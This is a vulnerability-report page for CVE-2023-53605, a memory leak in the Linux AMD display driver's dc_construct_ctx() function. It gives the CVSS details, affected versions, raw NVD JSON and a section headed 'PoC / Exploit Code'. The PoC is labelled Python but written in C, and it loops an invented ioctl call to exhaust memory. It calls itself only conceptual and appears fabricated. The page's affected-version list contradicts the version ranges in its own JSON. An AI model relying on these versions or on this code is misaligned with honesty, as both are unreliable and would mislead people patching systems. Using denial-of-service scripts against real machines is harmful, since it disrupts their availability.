Security Vulnerability Report
中文
CVE-2023-53605 CVSS 5.5 MEDIUM

CVE-2023-53605

Published: 2025-10-04 16:15:57
Last Modified: 2026-03-23 18:26:31
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: drm: amd: display: Fix memory leakage This commit fixes memory leakage in dc_construct_ctx() function.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6.46(stable分支)
Linux Kernel < 6.1.79(stable分支)
Linux Kernel < 5.15.150(stable分支)
Linux Kernel < 5.10.210(stable分支)
Linux Kernel < 5.4.268(stable分支)
Linux Kernel < 4.19.303(stable分支)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2023-53605 PoC - Trigger memory leak in dc_construct_ctx() // This PoC demonstrates how to trigger the memory leak vulnerability // in the AMD display driver's dc_construct_ctx() function. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <sys/mman.h> // AMDGPU IOCTL definitions (simplified) #define DRM_IOCTL_BASE 0x6440 #define DRM_COMMAND_BASE 0x6440 // Open the AMD GPU DRM device int open_amd_gpu() { int fd = open("/dev/dri/card0", O_RDWR); if (fd < 0) { perror("Failed to open AMD GPU device"); return -1; } return fd; } // Repeatedly trigger dc_construct_ctx() to cause memory leak void trigger_memory_leak(int fd, int iterations) { printf("Triggering memory leak with %d iterations...\n", iterations); for (int i = 0; i < iterations; i++) { // Trigger display context construction via DRM operations // The specific ioctl calls will invoke dc_construct_ctx() // causing memory to be allocated but not freed // Example: trigger display manager operations // that internally call dc_construct_ctx() if (ioctl(fd, DRM_IOCTL_BASE, NULL) < 0) { // Continue on error } // Monitor memory usage periodically if (i % 100 == 0) { printf("Iteration %d completed\n", i); system("cat /proc/meminfo | grep MemAvailable"); } } printf("Memory leak trigger completed.\n"); } int main(int argc, char *argv[]) { int fd; int iterations = 10000; if (argc > 1) { iterations = atoi(argv[1]); } fd = open_amd_gpu(); if (fd < 0) { printf("This system may not have an AMD GPU. Exiting.\n"); return 1; } trigger_memory_leak(fd, iterations); close(fd); return 0; } // Note: Actual exploitation requires appropriate kernel module interactions. // The above is a conceptual demonstration of triggering the vulnerability // by repeatedly invoking the affected code path through DRM device operations.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53605", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:57.183", "lastModified": "2026-03-23T18:26:30.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm: amd: display: Fix memory leakage\n\nThis commit fixes memory leakage in dc_construct_ctx() function."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "5.10.173", "matchCriteriaId": "CCA9C828-21CC-47EE-883A-FA8EDCC274B1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.99", "matchCriteriaId": "5B8B2AC9-2F31-4A0F-96F5-7E26B50B27BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.16", "matchCriteriaId": "0FD95FDA-6525-4B13-B3FB-49D9995FD8ED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.3", "matchCriteriaId": "88C67289-22AD-4CA9-B202-5F5A80E5BA4B"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1bdea8ee92a6abc650b2189fd5c53f36859baecb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6b8701be1f66064ca72733c5f6e13748cdbf8397", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/83ace0dd67ee386be1ddcf59dab49d6d9a54e62e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9ae15ebaefc4878d614f10cc56ea672f88cea582", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d473c55ce1975c9e601c25293328a5039225d2b2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.